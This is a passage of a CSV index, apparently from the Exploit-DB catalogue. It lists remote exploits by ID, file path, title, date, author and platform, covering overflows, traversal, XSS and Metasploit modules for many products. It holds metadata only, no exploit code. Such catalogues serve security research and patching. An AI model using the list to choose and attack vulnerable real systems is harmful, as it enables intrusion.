Overflow",2004-12-15,"Mohammed Khan",windows,remote, -25027,exploits/windows/remote/25027.txt,"abctab2ps 1.6.3 - 'Write_Heading' '.ABC' Remote Buffer Overflow",2004-12-15,"Limin Wang",windows,remote, -25028,exploits/multiple/remote/25028.txt,"CSV2XML 0.5.1 - Remote Buffer Overflow",2004-12-15,"Limin Wang",multiple,remote, -25029,exploits/windows/remote/25029.txt,"abctab2ps 1.6.3 - 'Trim_Title' '.ABC' File Remote Buffer Overflow",2004-12-15,"Limin Wang",windows,remote, -25030,exploits/linux/remote/25030.txt,"GNU UnRTF 0.19.3 - Font Table Conversion Buffer Overflow",2004-12-15,"Yosef Klein",linux,remote, -25031,exploits/windows/remote/25031.html,"Microsoft Windows Media Player 9.0 - ActiveX Control Media File Attribute Corruption",2004-12-18,"Arman Nayyeri",windows,remote, -25032,exploits/windows/remote/25032.html,"Microsoft Windows Media Player 9.0 - ActiveX Control File Enumeration",2004-12-18,"Arman Nayyeri",windows,remote, -25033,exploits/windows/remote/25033.txt,"GREED 0.81 - '.GRX' File List Buffer Overflow",2004-12-15,"Manigandan Radhakrishnan",windows,remote, -25034,exploits/windows/remote/25034.txt,"GREED 0.81 - '.GRX' File List Command Execution",2004-12-15,"Manigandan Radhakrishnan",windows,remote, -25035,exploits/linux/remote/25035.txt,"PCAL 4.x - Calendar File 'getline' Remote Buffer Overflow",2004-12-15,"Danny Lungstrom",linux,remote, -25036,exploits/linux/remote/25036.txt,"PCAL 4.x - Calendar File 'get_holiday' Remote Buffer Overflow",2004-12-15,"Danny Lungstrom",linux,remote, -25049,exploits/windows/remote/25049.txt,"Microsoft Windows XP/2000/2003 - 'winhlp32' Phrase Integer Overflow",2004-12-23,"flashsky fangxing",windows,remote, -25050,exploits/windows/remote/25050.txt,"Microsoft Windows XP/2000/2003 - 'winhlp32' Phrase Heap Overflow",2004-12-23,"flashsky fangxing",windows,remote, -25054,exploits/linux/remote/25054.txt,"konversation irc client 0.15 - Multiple Vulnerabilities",2005-01-19,wouter@coekaerts.be,linux,remote, -25057,exploits/windows/remote/25057.txt,"DivX Player 2.6 - '.Skin' File Directory Traversal",2005-01-21,"Luigi Auriemma",windows,remote, -25066,exploits/multiple/remote/25066.txt,"WebWasher Classic 2.2/2.3 - HTTP CONNECT Unauthorized Access",2005-01-28,"Oliver Karow",multiple,remote, -25072,exploits/multiple/remote/25072.txt,"CitrusDB 0.1/0.2/0.3 Credit Card Data - Remote Information Disclosure",2005-01-31,"Maximillian Dornseif",multiple,remote, -25079,exploits/multiple/remote/25079.txt,"People Can Fly Painkiller Gamespy 1.3 - CD-Key Hash Remote Buffer Overflow",2005-02-02,"Luigi Auriemma",multiple,remote, -25092,exploits/windows/remote/25092.txt,"Software602 602 Lan Suite 2004 2004.0.04.1221 - Arbitrary File Upload",2005-02-08,"Tan Chew Keong",windows,remote, -25094,exploits/windows/remote/25094.c,"Microsoft MSN Messenger 6.2.0137 - '.png' Remote Buffer Overflow",2005-02-08,ATmaCA,windows,remote, -25095,exploits/windows/remote/25095.txt,"Microsoft Internet Explorer 5.0.1 - Mouse Event URI Status Bar Obfuscation",2005-02-14,Paul,windows,remote, -25122,exploits/linux/remote/25122.txt,"glFTPd 1.x/2.0 'ZIP' Plugins - Multiple Directory Traversal Vulnerabilities",2005-02-18,"Paul Craig",linux,remote, -25129,exploits/windows/remote/25129.html,"Microsoft Internet Explorer 6 - Pop-up Window Title Bar Spoofing",2005-02-21,"bitlance winter",windows,remote, -25132,exploits/multiple/remote/25132.txt,"Bontago Game Server 1.1 - Remote Nickname Buffer Overrun",2005-02-21,"Luigi Auriemma",multiple,remote, -25133,exploits/multiple/remote/25133.txt,"xinkaa Web station 1.0.3 - Directory Traversal",2005-02-21,"Luigi Auriemma",multiple,remote, -25136,exploits/php/remote/25136.rb,"phpMyAdmin - 'preg_replace' Authenticated Remote Code Execution (Metasploit)",2013-05-01,Metasploit,php,remote, -25137,exploits/php/remote/25137.rb,"WordPress Plugin W3 Total Cache - PHP Code Execution (Metasploit)",2013-05-01,Metasploit,php,remote, -25144,exploits/windows/remote/25144.txt,"sd server 4.0.70 - Directory Traversal",2005-02-21,CorryL,windows,remote, -25146,exploits/windows/remote/25146.txt,"OpenConnect WebConnect 6.4/6.5 - jretest.html Traversal Arbitrary File Access",2005-02-21,"Dennis Rand",windows,remote, -25150,exploits/linux/remote/25150.txt,"Winace UnAce 1.x - ACE Archive Directory Traversal",2005-02-23,"Ulf Harnhammar",linux,remote, -25157,exploits/windows/remote/25157.txt,"Microsoft Log Sink Class - ActiveX Control Arbitrary File Creation",2003-04-29,"Shane Hird",windows,remote, -25163,exploits/windows/remote/25163.txt,"CIS WebServer 3.5.13 - Directory Traversal",2005-02-25,CorryL,windows,remote, -25166,exploits/windows/remote/25166.c,"Working Resources BadBlue 2.55 - MFCISAPICommand Remote Buffer Overflow (1)",2004-12-26,"Miguel Tarasc",windows,remote, -25167,exploits/windows/remote/25167.c,"Working Resources BadBlue 2.55 - MFCISAPICommand Remote Buffer Overflow (2)",2005-02-27,class101,windows,remote, -25181,exploits/windows/remote/25181.py,"Cerulean Studios Trillian 3.0 - Remote '.png' Image File Parsing Buffer Overflow",2005-03-02,"Tal Zeltzer",windows,remote, -25195,exploits/windows/remote/25195.txt,"Oracle Database 8i/9i - Multiple Directory Traversal Vulnerabilities",2005-03-07,"Cesar Cerrudo",windows,remote, -25196,exploits/windows/remote/25196.txt,"Yahoo! Messenger 5.x/6.0 - Offline Mode Status Remote Buffer Overflow",2005-03-08,"Mehrtash Mallahzadeh",windows,remote, -25205,exploits/multiple/remote/25205.txt,"Techland XPand Rally 1.0/1.1 - Remote Format String",2005-03-10,"Luigi Auriemma",multiple,remote, -25207,exploits/windows/remote/25207.txt,"PY Software Active Webcam 4.3/5.5 - WebServer Multiple Vulnerabilities",2005-03-10,Sowhat,windows,remote, -25209,exploits/multiple/remote/25209.pl,"MySQL 4.x - CREATE FUNCTION Arbitrary libc Code Execution",2005-03-11,"Stefano Di Paola",multiple,remote, -25210,exploits/multiple/remote/25210.php,"MySQL 4.x - CREATE FUNCTION mysql.func Table Arbitrary Library Injection",2005-03-11,"Stefano Di Paola",multiple,remote, -25211,exploits/multiple/remote/25211.c,"MySQL 4.x - CREATE Temporary TABLE Symlink Privilege Escalation",2006-01-18,"Marco Ivaldi",multiple,remote, -25221,exploits/linux/remote/25221.txt,"Mozilla Suite/Firefox/Thunderbird - Nested Anchor Tag Status Bar Spoofing",2005-03-14,"bitlance winter",linux,remote, -25238,exploits/multiple/remote/25238.txt,"Icecast 2.x - XSL Parser Multiple Vulnerabilities",2005-03-18,patrick,multiple,remote, -25274,exploits/windows/remote/25274.html,"Maxthon Web Browser 1.2 - Search Bar Information Disclosure",2005-03-25,"Aviv Raff",windows,remote, -25275,exploits/linux/remote/25275.c,"Smail 3 - Multiple Remote/Local Vulnerabilities",2005-03-25,infamous42md,linux,remote, -25291,exploits/multiple/remote/25291.txt,"Tincat Network Library - Remote Buffer Overflow",2005-03-28,"Luigi Auriemma",multiple,remote, -25775,exploits/linux/remote/25775.rb,"Nginx 1.3.9 < 1.4.0 - Chuncked Encoding Stack Buffer Overflow (Metasploit)",2013-05-28,Metasploit,linux,remote,80 -25297,exploits/linux/remote/25297.txt,"Dovecot with Exim - 'sender_address' Remote Command Execution",2013-05-07,"RedTeam Pentesting GmbH",linux,remote, -25319,exploits/windows/remote/25319.txt,"FastStone 4in1 Browser 1.2 - Web Server Directory Traversal",2005-03-29,"Donato Ferrante",windows,remote, -25321,exploits/linux/remote/25321.c,"YepYep MTFTPD 0.2/0.3 - Remote CWD Argument Format String",2005-03-30,gunzip,linux,remote, -25325,exploits/windows/remote/25325.txt,"BlueSoleil 1.4 - Object Push Service BlueTooth Arbitrary File Upload / Directory Traversal",2005-04-01,"Kevin Finisterre",windows,remote, -25335,exploits/unix/remote/25335.txt,"IBM iSeries AS400 LDAP Server - Remote Information Disclosure",2005-04-04,"Shalom Carmel",unix,remote, -25336,exploits/windows/remote/25336.txt,"Logics Software LOG-FT - Arbitrary File Disclosure",2005-04-05,"Pedro Viuales & Rom Ramirez",windows,remote, -25359,exploits/hardware/remote/25359.txt,"Linksys WET11 - Password Update Remote Authentication Bypass",2005-04-07,"Kristian Hermansen",hardware,remote, -25365,exploits/windows/remote/25365.txt,"AN HTTPD 1.42 - Arbitrary Log Content Injection",2005-04-08,"Tan Chew Keong",windows,remote, -25375,exploits/linux/remote/25375.pl,"KDE KMail 1.7.1 - HTML EMail Remote Email Content Spoofing",2005-04-11,"Noam Rathaus",linux,remote, -25384,exploits/windows/remote/25384.c,"Microsoft Windows XP/2000 - Internet Protocol Validation Remote Code Execution (2)",2005-04-16,"Yuri Gushin",windows,remote, -25385,exploits/windows/remote/25385.cpp,"Microsoft Internet Explorer 5.0.1 - Content Advisor File Handling Buffer Overflow (MS05-020)",2005-04-12,"Miguel Tarasc",windows,remote, -25386,exploits/windows/remote/25386.txt,"Microsoft Internet Explorer 5.0.1 - DHTML Object Race Condition Memory Corruption",2005-04-12,"Berend-Jan Wever",windows,remote, -25391,exploits/multiple/remote/25391.txt,"XAMPP - 'Phonebook.php' Multiple Remote HTML Injection Vulnerabilities",2005-04-12,"Morning Wood",multiple,remote, -25392,exploits/linux/remote/25392.c,"Salim Gasmi GLD (Greylisting Daemon) 1.x - Postfix Greylisting Daemon Buffer Overflow",2005-04-12,Xpl017Elz,linux,remote, -25395,exploits/multiple/remote/25395.txt,"Sun JavaMail 1.3.2 - 'MimeBodyPart.getFileName' Directory Traversal",2005-04-12,"Rafael San Miguel Carrasco",multiple,remote, -25396,exploits/multiple/remote/25396.txt,"Oracle 8.x/9.x/10.x Database - Multiple SQL Injections",2005-04-13,"Esteban Martinez Fayo",multiple,remote, -25397,exploits/multiple/remote/25397.txt,"Oracle Database 10.1 - MDSYS.MD2.SDO_CODE_SIZE Buffer Overflow",2005-04-13,"Esteban Martinez Fayo",multiple,remote, -25420,exploits/multiple/remote/25420.txt,"IBM Websphere 5.0/5.1/6.0 - Application Server Web Server Root JSP Source Code Disclosure",2005-04-13,"SPI Labs",multiple,remote, -25421,exploits/windows/remote/25421.txt,"RSA Security RSA Authentication Agent For Web 5.2 - Cross-Site Scripting",2005-04-15,"Oliver Karow",windows,remote, -25445,exploits/multiple/remote/25445.rb,"SAP SOAP RFC - SXPG_CALL_SYSTEM Remote Command Execution (Metasploit)",2013-05-14,Metasploit,multiple,remote,8000 -25446,exploits/multiple/remote/25446.rb,"SAP SOAP RFC - SXPG_COMMAND_EXECUTE Remote Command Execution (Metasploit)",2013-05-14,Metasploit,multiple,remote,8000 -25452,exploits/multiple/remote/25452.pl,"Oracle 10g Database - 'SUBSCRIPTION_NAME' SQL Injection (1)",2007-02-23,bunker,multiple,remote, -25453,exploits/multiple/remote/25453.pl,"Oracle 10g Database - 'SUBSCRIPTION_NAME' SQL Injection (2)",2007-02-26,bunker,multiple,remote, -25454,exploits/windows/remote/25454.txt,"Microsoft Windows 98/2000 Explorer - Preview Pane Script Injection",2005-04-19,"GreyMagic Software",windows,remote, -25486,exploits/windows/remote/25486.txt,"RaidenFTPd 2.4 - Unauthorized File Access",2005-04-21,"Lachlan. H",windows,remote, -25487,exploits/windows/remote/25487.txt,"yawcam 0.2.5 - Directory Traversal",2005-04-21,"Donato Ferrante",windows,remote, -25517,exploits/linux/remote/25517.rb,"Mutiny 5 - Arbitrary File Upload (Metasploit)",2013-05-17,Metasploit,linux,remote, -25526,exploits/linux/remote/25526.c,"Affix Bluetooth Protocol Stack 3.1/3.2 - Signed Buffer Index (2)",2005-04-25,kf,linux,remote, -25546,exploits/windows/remote/25546.txt,"BEA WebLogic Server 8.1 / WebLogic Express Administration Console - Cross-Site Scripting",2005-04-26,"Alexander Kornbrust",windows,remote, -25547,exploits/linux/remote/25547.pl,"Convert-UUlib 1.04/1.05 Perl Module - Remote Buffer Overflow",2005-04-26,CorryL,linux,remote, -25557,exploits/windows/remote/25557.txt,"HP OpenView Radia Management Portal 1.0/2.0 - Remote Command Execution",2005-04-28,"David Morgan",windows,remote, -25559,exploits/multiple/remote/25559.txt,"Oracle Application Server 9.0 - HTTP Service Mod_Access Restriction Bypass",2005-04-28,"Alexander Kornbrust",multiple,remote, -25561,exploits/multiple/remote/25561.txt,"Oracle Application Server 9i Webcache - Arbitrary File Corruption",2005-04-28,"Alexander Kornbrust",multiple,remote, -25562,exploits/multiple/remote/25562.txt,"Oracle Application Server 9i - Webcache Cache_dump_file Cross-Site Scripting",2005-04-28,"Alexander Kornbrust",multiple,remote, -25563,exploits/multiple/remote/25563.txt,"Oracle Application Server 9i - Webcache PartialPageErrorPage Cross-Site Scripting",2005-04-28,"Alexander Kornbrust",multiple,remote, -25571,exploits/windows/remote/25571.txt,"video cam server 1.0 - Directory Traversal",2005-05-02,"Donato Ferrante",windows,remote, -25572,exploits/windows/remote/25572.txt,"Video Cam Server 1.0 - Full Path Disclosure",2005-05-02,"Donato Ferrante",windows,remote, -25573,exploits/windows/remote/25573.txt,"Video Cam Server 1.0 - Administrative Interface Authentication Bypass",2005-05-02,"Donato Ferrante",windows,remote, -25574,exploits/multiple/remote/25574.txt,"Mtp-Target 1.2.2 Client - Remote Format String",2005-05-02,"Luigi Auriemma",multiple,remote, -25597,exploits/windows/remote/25597.txt,"Adobe SVG Viewer 3.0 - ActiveX Control SRC Information Disclosure",2005-05-04,"Robert Fly",windows,remote, -25598,exploits/osx/remote/25598.txt,"Apple Mac OSX 10.x - BlueTooth Directory Traversal",2005-05-04,"Kevin Finisterre",osx,remote, -25600,exploits/windows/remote/25600.txt,"simplecam 1.2 - Directory Traversal",2005-05-04,"Donato Ferrante",windows,remote, -25608,exploits/hardware/remote/25608.rb,"Linksys WRT160N v2 - 'apply.cgi' Remote Command Injection (Metasploit)",2013-05-21,Metasploit,hardware,remote,80 -25609,exploits/hardware/remote/25609.rb,"D-Link DIR-615H - OS Command Injection (Metasploit)",2013-05-21,Metasploit,hardware,remote,80 -25820,exploits/linux/remote/25820.txt,"Finjan SurfinGate 7.0 - '.ASCII' File Extension File Filter Circumvention",2005-06-14,d.schroeter@gmx.de,linux,remote, -25822,exploits/windows/remote/25822.xml,"Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence / File Disclosure",2005-06-15,"Sverre H. Huseby",windows,remote, -25613,exploits/multiple/remote/25613.txt,"Oracle 9i/10g - Database Fine Grained Audit Logging Failure",2005-05-05,"Alexander Kornbrust",multiple,remote, -25621,exploits/windows/remote/25621.txt,"software602 602 lan suite 2004 - Directory Traversal",2005-05-05,dr_insane,windows,remote, -25624,exploits/unix/remote/25624.c,"Apache 1.3.x - HTDigest Realm Command Line Argument Buffer Overflow (1)",2005-05-06,"Luca Ercoli",unix,remote, -25625,exploits/unix/remote/25625.c,"Apache 1.3.x - HTDigest Realm Command Line Argument Buffer Overflow (2)",2005-05-11,K-sPecial,unix,remote, -25626,exploits/osx/remote/25626.c,"4D WebSTAR 5.3/5.4 Tomcat Plugin - Remote Buffer Overflow",2005-05-06,"Braden Thomas",osx,remote, -25627,exploits/php/remote/25627.txt,"PHP Advanced Transfer Manager 1.21 - Arbitrary File Upload",2005-05-06,tjomi4,php,remote, -25643,exploits/windows/remote/25643.txt,"GeoVision Digital Surveillance System 6.0 4/6.1 - Unauthorized '.JPEG' Image Access",2005-05-10,"Tirath Rai",windows,remote, -25646,exploits/windows/remote/25646.txt,"MyServer 0.8 - Cross-Site Scripting",2005-05-10,dr_insane,windows,remote, -25648,exploits/cgi/remote/25648.txt,"neteyes nexusway border gateway - Multiple Vulnerabilities",2005-05-11,pokley,cgi,remote, -25652,exploits/windows/remote/25652.txt,"APG Technology ClassMaster - Unauthorized Folder Access",2005-05-12,"Alex Garrett",windows,remote, -25669,exploits/linux/remote/25669.txt,"pserv 3.2 - Directory Traversal",2005-05-16,"Claus R. F. Overbeck",linux,remote, -25670,exploits/multiple/remote/25670.html,"Mozilla Suite And Firefox - DOM Property Overrides Code Execution",2005-05-16,moz_bug_r_a4,multiple,remote, -25684,exploits/hardware/remote/25684.html,"D-Link DSL Router - Remote Authentication Bypass",2005-05-19,"Francesco Orro",hardware,remote, -25687,exploits/freebsd/remote/25687.c,"Picasm 1.10/1.12 - Error Generation Remote Buffer Overflow",2005-05-20,"Shaun Colley",freebsd,remote, -25691,exploits/multiple/remote/25691.txt,"Warrior Kings 1.3 And Warrior Kings: Battles 1.23 - Remote Format String",2005-05-23,"Luigi Auriemma",multiple,remote, -25694,exploits/windows/remote/25694.txt,"Sambar Server 5.x/6.0/6.1 - 'results.stm' indexname Cross-Site Scripting",2005-05-24,"Jamie Fisher",windows,remote, -25695,exploits/windows/remote/25695.txt,"Sambar Server 5.x/6.0/6.1 - logout RCredirect Cross-Site Scripting",2005-05-24,"Jamie Fisher",windows,remote, -25696,exploits/windows/remote/25696.txt,"Sambar Server 5.x/6.0/6.1 - Server Referer Cross-Site Scripting",2005-05-24,"Jamie Fisher",windows,remote, -25697,exploits/windows/remote/25697.txt,"Blue Coat Reporter 7.0/7.1 - Privilege Escalation",2005-05-24,"Oliver Karow",windows,remote, -25698,exploits/windows/remote/25698.txt,"Blue Coat Reporter 7.0/7.1 - License HTML Injection",2005-05-24,"Oliver Karow",windows,remote, -25706,exploits/linux/remote/25706.cpp,"GNU Mailutils 0.6 - Mail Email Header Buffer Overflow",2004-08-10,infamous41md,linux,remote, -25708,exploits/multiple/remote/25708.txt,"Clever's Games Terminator 3: War of the Machines 1.16 Server - Remote Buffer Overflow",2005-05-26,"Luigi Auriemma",multiple,remote, -25710,exploits/multiple/remote/25710.txt,"C'Nedra 0.4 Network Plugin - 'Read_TCP_String' Remote Buffer Overflow",2005-05-26,"Luigi Auriemma",multiple,remote, -25713,exploits/windows/remote/25713.txt,"SIEMENS Solid Edge ST4/ST5 WebPartHelper - ActiveX RFMSsvs!JShellExecuteEx Remote Code Execution",2013-05-26,rgod,windows,remote, -25755,exploits/windows/remote/25755.txt,"ServersCheck 5.9/5.10 - Directory Traversal",2005-05-30,rgod,windows,remote, -33414,exploits/php/remote/33414.php,"PHP 5.2.11 - 'htmlspecialCharacters()' Malformed Multibyte Character Cross-Site Scripting (1)",2009-12-17,hello@iwamot.com,php,remote, -33415,exploits/php/remote/33415.php,"PHP 5.2.11 - 'htmlspecialCharacters()' Malformed Multibyte Character Cross-Site Scripting (2)",2009-12-17,hello@iwamot.com,php,remote, -33423,exploits/hardware/remote/33423.txt,"Barracuda Web Application Firewall 660 - '/cgi-mod/index.cgi' Multiple HTML Injection Vulnerabilities",2009-12-19,Global-Evolution,hardware,remote, -25784,exploits/windows/remote/25784.txt,"Microsoft Outlook Express 4.x/5.x/6.0 - Attachment Processing File Extension Obfuscation",2005-06-01,"Benjamin Tobias Franz",windows,remote, -25802,exploits/linux/remote/25802.txt,"C.J. Steele Tattle - Remote Command Execution",2005-06-07,b0iler,linux,remote, -25814,exploits/windows/remote/25814.rb,"IBM SPSS SamplePower C1Tab - ActiveX Heap Overflow (Metasploit)",2013-05-29,Metasploit,windows,remote, -25835,exploits/windows/remote/25835.html,"Logic Print 2013 - vTable Overwrite Stack Overflow",2013-05-30,h1ch4m,windows,remote, -25836,exploits/windows/remote/25836.py,"Intrasrv Simple Web Server 1.0 - Remote Code Execution (SEH)",2013-05-30,xis_one,windows,remote, -25841,exploits/windows/remote/25841.txt,"Yaws 1.5x - Source Code Disclosure",2005-06-17,"Daniel Fabian",windows,remote, -25842,exploits/multiple/remote/25842.txt,"JBoss 3.x/4.0.2 - HTTP Request Remote Information Disclosure",2005-06-17,"Marc Schoenefeld",multiple,remote, -25851,exploits/windows/remote/25851.rb,"Lianja SQL 1.0.0RC5.1 - db_netserver Stack Buffer Overflow (Metasploit)",2013-05-31,Metasploit,windows,remote,8001 -26288,exploits/linux/remote/26288.txt,"Mozilla Browser/Firefox - Arbitrary Command Execution",2005-09-20,"eter Zelezny",linux,remote, -25948,exploits/windows/remote/25948.txt,"Novell NetMail 3.x - Automatic Script Execution",2005-07-06,shalom@venera.com,windows,remote, -25949,exploits/hardware/remote/25949.pl,"Cisco VoIP Phone CP-7940 3.x - Spoofed SIP Status Message Handling",2005-07-06,DrFrancky,hardware,remote, -25933,exploits/windows/remote/25933.txt,"WhitSoft SlimServe HTTPd 1.0/1.1 - Directory Traversal",2001-03-04,se00020,windows,remote, -25944,exploits/multiple/remote/25944.txt,"IBM Lotus Domino Notes 6.0/6.5 - Mail Template Automatic Script Execution",2005-07-06,shalom@venera.com,multiple,remote, -25966,exploits/hardware/remote/25966.txt,"Nokia Affix 2.0/2.1/3.x - BTSRV/BTOBEX Remote Command Execution",2005-07-12,"Kevin Finisterre",hardware,remote, -25970,exploits/linux/remote/25970.py,"Exim - 'sender_address' Remote Code Execution",2013-06-05,eKKiM,linux,remote, -25975,exploits/linux/remote/25975.rb,"MiniUPnPd 1.0 - Remote Stack Buffer Overflow Remote Code Execution (Metasploit)",2013-06-05,Metasploit,linux,remote,5555 -25979,exploits/windows/remote/25979.rb,"Oracle WebCenter Content - 'CheckOutAndOpen.dll' ActiveX Remote Code Execution (Metasploit)",2013-06-05,Metasploit,windows,remote, -25980,exploits/multiple/remote/25980.rb,"Apache Struts - includeParams Remote Code Execution (Metasploit)",2013-06-05,Metasploit,multiple,remote,8080 -25986,exploits/php/remote/25986.txt,"Plesk < 9.5.4 - Remote Command Execution",2013-06-05,kingcope,php,remote, -25987,exploits/hardware/remote/25987.txt,"Xpient - Cash Drawer Operation",2013-06-05,"Core Security",hardware,remote, -25988,exploits/multiple/remote/25988.txt,"Oracle9i Application Server 9.0.2 - MOD_ORADAV Access Control",2003-02-13,"David Litchfield",multiple,remote, -25989,exploits/windows/remote/25989.txt,"NullSoft Winamp 5.0 - Malformed ID3v2 Tag Buffer Overflow",2005-07-15,"Leon Juranic",windows,remote, -25999,exploits/windows/remote/25999.rb,"Microsoft Internet Explorer - textNode Use-After-Free (MS13-037) (Metasploit)",2013-06-07,"Scott Bell",windows,remote, -26002,exploits/multiple/remote/26002.txt,"Oracle Reports Server 6.0.8/9.0.x - XML File Disclosure",2005-07-19,"Alexander Kornbrust",multiple,remote, -26003,exploits/multiple/remote/26003.txt,"Oracle Reports Server 6.0.8/9.0.x - Arbitrary File Disclosure",2005-07-19,"Alexander Kornbrust",multiple,remote, -26004,exploits/multiple/remote/26004.txt,"Oracle Reports Server 10g 9.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-19,"Alexander Kornbrust",multiple,remote, -26006,exploits/multiple/remote/26006.txt,"Oracle Reports Server 6.0.8/9.0.x - Unauthorized Report Execution",2005-07-19,"Alexander Kornbrust",multiple,remote, -26013,exploits/multiple/remote/26013.txt,"Oracle Forms 6i/9i/4.5.10/5.0/6.0.8/10g Services - Unauthorized Form Execution",2005-07-19,"Alexander Kornbrust",multiple,remote, -26022,exploits/hardware/remote/26022.txt,"ECI Telecom B-FOCuS Router 312+ - Unauthorized Access",2005-07-25,d.is.evil,hardware,remote, -26024,exploits/linux/remote/26024.txt,"sap internet graphics server 6.40 - Directory Traversal",2005-07-25,"Martin O'Neal",linux,remote, -26032,exploits/windows/remote/26032.html,"SPI Dynamics WebInspect 5.0.196 - Cross Application Script Injection",2005-07-26,QQLan@yandex.ru,windows,remote, -26035,exploits/windows/remote/26035.txt,"Advanced Guestbook 2.2/2.3 - User-Agent HTML Injection",2005-01-22,Carbonize,windows,remote, -26044,exploits/windows/remote/26044.txt,"MDaemon 8.0 - Content Filter Directory Traversal",2005-07-27,"Tan Chew Keong",windows,remote, -26071,exploits/multiple/remote/26071.txt,"NetworkActiv Web Server 1.0/2.0/3.0/3.5 - Cross-Site Scripting",2005-08-04,"Secunia Research",multiple,remote, -26332,exploits/multiple/remote/26332.txt,"Oracle 9 - XML DB Cross-Site Scripting",2005-10-07,"Alexander Kornbrust",multiple,remote, -26075,exploits/hardware/remote/26075.txt,"MobileIron Virtual Smartphone Platform - Privilege Escalation",2013-06-10,prdelka,hardware,remote, -26299,exploits/windows/remote/26299.c,"MultiTheftAuto 0.5 - Multiple Vulnerabilities",2005-09-26,"Luigi Auriemma",windows,remote, -26101,exploits/linux/remote/26101.txt,"EMC Navisphere Manager 6.x - Directory Traversal / Information Disclosure",2005-08-05,anonymous,linux,remote, -40874,exploits/android/remote/40874.txt,"Google Android - Inter-Process munmap with User-Controlled Size in android.graphics.Bitmap",2016-12-06,"Google Security Research",android,remote, -26123,exploits/multiple/remote/26123.rb,"Java - Web Start Double Quote Injection Remote Code Execution (Metasploit)",2013-06-11,Rh0,multiple,remote, -26134,exploits/windows/remote/26134.rb,"Synactis PDF In-The-Box - ConnectToSynactic Stack Buffer Overflow (Metasploit)",2013-06-11,Metasploit,windows,remote, -26135,exploits/multiple/remote/26135.rb,"Java Applet - Driver Manager Privileged 'toString()' Remote Code Execution (Metasploit)",2013-06-11,Metasploit,multiple,remote, -26151,exploits/windows/remote/26151.txt,"Isemarket JaguarControl - ActiveX Control Buffer Overflow",2005-08-13,"Tacettin Karadeniz",windows,remote, -26152,exploits/osx/remote/26152.txt,"Apple Mac OSX 10.4 Weblog Server - Cross-Site Scripting",2005-08-15,"Donnie Werner",osx,remote, -26167,exploits/windows/remote/26167.pl,"Microsoft Visual Studio .NET - 'msdds.dll' Remote Code Execution",2005-08-17,anonymous,windows,remote, -26168,exploits/hardware/remote/26168.txt,"Juniper NetScreen 5.0 - VPN 'Username' Enumeration",2005-08-18,"Roy Hills",hardware,remote, -26175,exploits/windows/remote/26175.rb,"Microsoft Internet Explorer - COALineDashStyleArray Integer Overflow (MS13-009) (Metasploit)",2013-06-13,Metasploit,windows,remote, -26196,exploits/windows/remote/26196.txt,"BEA WebLogic 7.0/8.1 - Administration Console Cross-Site Scripting",2005-08-24,GomoR,windows,remote, -26198,exploits/linux/remote/26198.txt,"Astaro Security Linux 6.0 01 - HTTP CONNECT Unauthorized Access",2005-08-25,"Oliver Karow",linux,remote, -26210,exploits/multiple/remote/26210.txt,"bfcommand & control server 1.22/2.0/2.14 manager - Multiple Vulnerabilities",2005-08-29,"Luigi Auriemma",multiple,remote, -26221,exploits/windows/remote/26221.txt,"Rediff Bol 7.0 Instant Messenger - ActiveX Control Information Disclosure",2005-09-05,"Gregory R. Panakkal",windows,remote, -26230,exploits/windows/remote/26230.txt,"Microsoft IIS 5.1 - WebDAV HTTP Request Source Code Disclosure",2005-09-04,"Inge Henriksen",windows,remote, -26306,exploits/windows/remote/26306.txt,"NateOn Messenger 3.0 - Arbitrary File Download / Buffer Overflow",2005-09-29,saintlinu,windows,remote, -26330,exploits/multiple/remote/26330.txt,"Oracle HTML DB 1.5/1.6 - 'wwv_flow.accept?p_t02' Cross-Site Scripting",2005-10-07,Red-Database-Security,multiple,remote, -26318,exploits/hardware/remote/26318.py,"TP-Link PS110U Print Server TL - Sensitive Information Enumeration",2013-06-19,SANTHO,hardware,remote, -26329,exploits/multiple/remote/26329.txt,"Oracle HTML DB 1.5/1.6 - 'f?p=' Cross-Site Scripting",2005-10-07,Red-Database-Security,multiple,remote, -26374,exploits/windows/remote/26374.txt,"Xerver 4.17 - Single Dot File Request Source Disclosure",2005-10-19,"Ziv Kamir",windows,remote, -26375,exploits/windows/remote/26375.txt,"Xerver 4.17 - Forced Directory Listing",2005-10-19,"Ziv Kamir",windows,remote, -26376,exploits/windows/remote/26376.txt,"Xerver 4.17 Server - URI Null Character Cross-Site Scripting",2005-10-19,"Ziv Kamir",windows,remote, -26412,exploits/hardware/remote/26412.pl,"Seowonintech Devices - Remote Command Execution",2013-06-24,"Todor Donev",hardware,remote, -26419,exploits/linux/remote/26419.rb,"ZPanel 10.0.0.2 htpasswd Module - 'Username' Command Execution (Metasploit)",2013-06-24,Metasploit,linux,remote, -26420,exploits/windows/remote/26420.rb,"HP System Management Homepage - JustGetSNMPQueue Command Injection (Metasploit)",2013-06-24,Metasploit,windows,remote,2381 -26421,exploits/php/remote/26421.rb,"LibrettoCMS File Manager - Arbitrary File Upload (Metasploit)",2013-06-24,Metasploit,php,remote, -26422,exploits/linux/remote/26422.rb,"MoinMoin - twikidraw Action Traversal Arbitrary File Upload (Metasploit)",2013-06-24,Metasploit,linux,remote, -26424,exploits/windows/remote/26424.txt,"Snoopy 0.9x/1.0/1.2 - Arbitrary Command Execution",2005-10-26,"D. Fabian",windows,remote, -26443,exploits/php/remote/26443.php,"PHP 4.x/5.0.x - Arbitrary File Upload GLOBAL Variable Overwrite",2005-10-31,rgod,php,remote, -26460,exploits/windows/remote/26460.c,"Asus VideoSecurity Online 3.5 - Web Server Authentication Buffer Overflow",2005-11-02,"Luigi Auriemma",windows,remote, -26464,exploits/windows/remote/26464.txt,"IPSwitch WhatsUp Small Business 2004 Report Service - Directory Traversal",2005-11-03,"Dennis Rand",windows,remote, -26471,exploits/windows/remote/26471.py,"PCMan FTP Server 2.0.7 - Remote Buffer Overflow",2013-06-27,"Jacob Holcomb",windows,remote,21 -26491,exploits/windows/remote/26491.txt,"Antville 1.1 - Cross-Site Scripting",2005-11-09,"Moritz Naumann",windows,remote, -26493,exploits/windows/remote/26493.py,"Bifrost 1.2.1 - Remote Buffer Overflow",2013-06-30,"Mohamed Clay",windows,remote, -26494,exploits/windows/remote/26494.py,"Bifrost 1.2d - Remote Buffer Overflow",2013-06-30,"Mohamed Clay",windows,remote, -26495,exploits/windows/remote/26495.py,"PCMan FTP Server 2.0 - Remote Buffer Overflow",2013-06-30,Chako,windows,remote, -26497,exploits/windows/remote/26497.c,"RealNetworks RealOne Player/RealPlayer - '.RM' File Remote Stack Based Buffer Overflow",2005-11-10,nolimit,windows,remote, 